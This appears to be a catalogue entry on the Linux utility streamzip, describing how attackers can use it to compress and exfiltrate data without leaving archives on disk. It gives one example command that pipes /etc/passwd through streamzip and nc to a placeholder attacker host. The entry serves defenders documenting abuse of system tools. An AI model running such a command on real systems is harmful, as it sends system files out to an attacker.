streamzip
streamzip is a system utility that can be utilized to compress data from "stdin" and write the data directly to "stdout", no temporary files are created. The tool can be used by malicious actors to collect and exfiltrate sensitive data without leaving staged data archive artifacts on disk.
Author: Gabriel De Jesus (0xv1n) Created: 2024-07-15
Paths
/usr/bin/streamzip Example Use Cases
Copy and compress sensitive data locally
The following command reads file data and compresses the data for exfiltration
dd if=/etc/passwd | streamzip - stream | nc ATTACKER_IP PORTDetections
- No detection content at time of writing